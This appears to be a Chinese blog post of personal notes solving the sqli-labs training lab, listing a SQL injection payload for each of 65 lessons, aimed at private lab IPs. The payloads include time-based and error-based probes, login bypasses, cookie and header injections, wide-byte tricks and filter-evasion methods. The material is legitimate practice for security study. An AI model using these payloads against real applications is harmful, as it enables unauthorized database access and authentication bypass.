sqli-labs靶机测试笔记

总结:

此lab设计了很多场景,但是个人测试时未按照其规划思路来只是验证出有漏洞即可,做完后个人的感悟就是 非常累,很多题目都是简单的替换单引号,双引号,双引号加括号这类,纯粹体力活。

其中个人认为有价值做的题目是24,26,27,32,34,仅此而已。

注意一点是post型宽字节注入需要在burpsuite里改,使用hackbar时%df会被url加密导致不成功

靶机搭建建议使用vulstudy,一键搭建

1 http://10.150.10.186/Less-1/index.php?id=3' and sleep(3)%23

2 http://10.150.10.186/Less-2/index.php?id=3 and sleep(3)%23

3 http://10.150.10.186/Less-3/index.php?id=3')%20and%20sleep(3)%23

4 http://10.150.10.186/Less-4/index.php?id=3")%20and%20sleep(3)%23

5 http://10.150.10.186/Less-5/index.php?id=3' and sleep(3)%23

6 http://10.150.10.186/Less-6/index.php?id=3" and sleep(3)%23

7 http://10.150.10.186/Less-7/index.php?id=3'))%20and%20sleep(3)%23

8 http://10.150.10.186/Less-8/index.php?id=3' and sleep(6)%23

9 http://10.150.10.186/Less-9/index.php?id=3' and sleep(6)%23

10 http://10.150.10.186/Less-10/index.php?id=3" and sleep(6)%23

11 Username:admin'# Password:xx

12 admin")# xx

13 admin 1') or ('1=1

14 admin x" or "1=1

15 admin x' or '1=1

16 admin x") or ("1=1

17 admin x' and extractvalue(1,concat(0x5c,(select user())))#

18 Dumb Dumb 且user-agnet处替换为x',1,extractvalue(1,concat(0x5c,(select user()))))#

19 Dumb Dumb 且referer处替换为x',1,extractvalue(1,concat(0x5c,(select user()))))#

20 Dumb Dumb 且cookie处替换为uname=x' and extractvalue(1,concat(0x5c,(select user())))#

21 Dumb Dumb 且cookie处替换为uname=eCcpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg1Yywoc2VsZWN0IHVzZXIoKSkpKSM=

22 Dumb Dumb 且cookie处替换为uname=eCIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDVjLChzZWxlY3QgdXNlcigpKSkpIw==

23 http://192.168.61.242/Less-23/index.php?id=99' union select 1,extractvalue(1,concat(0x5c,(select user()))),%273

24 考查二阶注入 注册新用户用户名为admin' or 1=1# 之后重设任意密码即可

25 http://192.168.61.242/Less-25/index.php?id=1' aAndnd extractvalue(1,concat(0x5c,(select user())))%23

26 最为困难的是过滤了空格和注释符。其中空格绕过方式:%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /!/ tab ()
http://192.168.61.242/Less-26/index.php?id=1'||extractvalue(1,concat(0x5c,user()))|%271=1

27 http://192.168.61.242/Less-26/index.php?id=a'|extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),1))||'1=1

28 http://192.168.61.242/Less-28/index.php?id=a')union%a0select(database()),(user()),(%273

29 http://192.168.2.105/Less-29/index.php?id=x' and extractvalue(1,concat(0x5c,(select user()),1))%23

30 http://192.168.2.105/Less-30/index.php?id=1" and sleep(5)%23

31 http://192.168.2.105/Less-31/index.php?id=1") and extractvalue(1,concat(0x5c,(select user())))%23

32 http://192.168.61.242/Less-32/index.php?id=1�' and extractvalue(1,concat(0x5c,(select user())))%23

33 http://192.168.61.242/Less-33/index.php?id=1�' and extractvalue(1,concat(0x5c,(select user())))%23

34 uname=1%df%27%20and%20extractvalue(1,concat(0x5c,(select user())))%23&passwd=Dumb&submit=Submit
注意需要使用burpsuite改,hackbar改不行

35 http://192.168.2.105/Less-35/index.php?id=1 and sleep(5)%23

36 http://192.168.2.105/Less-36/index.php?id=1�\' and ascii(substr(database(),sleep(5),1))>97%23

37 post:uname=1%df%27%20and%20extractvalue(1,concat(0x5c,(select user())))%23&passwd=x&submit=Submit

38 http://192.168.2.105/Less-38/index.php?id=1' and ascii(substr(database(),sleep(5),1))%3E97%23

39 http://192.168.2.105/Less-39/index.php?id=1 and ascii(substr(database(),sleep(5),1))%3E97%23

40 http://192.168.2.105/Less-40/index.php?id=1')%20and%20ascii(substr(database(),sleep(5),1))%3E97%23

41 http://192.168.2.105/Less-41/index.php?id=1 and ascii(substr(database(),sleep(5),1))%3E97%23

42 lgin.php中post发送:login_user=admin&login_password=1'or+1=1%23&mysubmit=Login

43 lgin.php中post发送:login_user=admin&login_password=1')or+1=1%23&mysubmit=Login

44 lgin.php中post发送:login_user=admin&login_password=1'or+1=1%23&mysubmit=Login

45 lgin.php中post发送:login_user=admin&login_password=1')or+1=1%23&mysubmit=Login

46 http://192.168.2.105/Less-46/index.php?sort=1 and extractvalue(1,concat(0x5c,(select user())))

47 http://192.168.2.105/Less-47/index.php?sort=1' and extractvalue(1,concat(0x5c,(select user())))%23

48 http://192.168.2.105/Less-48/index.php?sort=1 and ascii(substr(database(),sleep(5),1))%3E97%23

49 http://192.168.2.105/Less-49/index.php?sort=1' and ascii(substr(database(),sleep(5),1))%3E97%23

50 http://192.168.2.105/Less-50/index.php?sort=1 and ascii(substr(database(),sleep(5),1))%3E97%23

51 http://192.168.2.105/Less-51/index.php?sort=1' and ascii(substr(database(),sleep(5),1))%3E97%23

52 http://192.168.2.105/Less-52/index.php?sort=1 and ascii(substr(database(),sleep(5),1))%3E97%23

53 http://192.168.2.105/Less-53/index.php?sort=1' and ascii(substr(database(),sleep(5),1))%3E97%23

54 http://192.168.2.105/Less-54/index.php?id=1' and ascii(substr(database(),sleep(5),1))%3E97%23

55 http://192.168.2.105/Less-55/index.php?id=1)%20and%20ascii(substr(database(),sleep(5),1))%3E97%23

56 http://192.168.2.105/Less-56/index.php?id=1')%20and%20ascii(substr(database(),sleep(5),1))%3E97%23

57 http://192.168.2.105/Less-57/index.php?id=1" and ascii(substr(database(),sleep(5),1))%3E97%23

58 http://192.168.2.105/Less-58/index.php?id=1' and ascii(substr(database(),sleep(5),1))%3E97%23

59 http://192.168.2.105/Less-59/index.php?id=1 and ascii(substr(database(),sleep(5),1))%3E97%23

60 http://192.168.2.105/Less-60/index.php?id=1")%20and%20ascii(substr(database(),sleep(5),1))%3E97%23

61 http://192.168.2.105/Less-61/index.php?id=1'))%20and%20ascii(substr(database(),sleep(5),1))%3E97%23

62 http://192.168.2.105/Less-62/index.php?id=1')%20and%20ascii(substr(database(),sleep(5),1))%3E97%23

63 http://192.168.2.105/Less-63/index.php?id=1' and ascii(substr(database(),sleep(5),1))%3E97%23

64 http://192.168.2.105/Less-64/index.php?id=1))%20and%20ascii(substr(database(),sleep(5),1))%3E97%23

65 http://192.168.2.105/Less-65/index.php?id=1")%20and%20ascii(substr(database(),sleep(5),1))%3E97%23

posted @ 2020-08-25 11:17  总得前行  阅读(259)  评论(0编辑  收藏  举报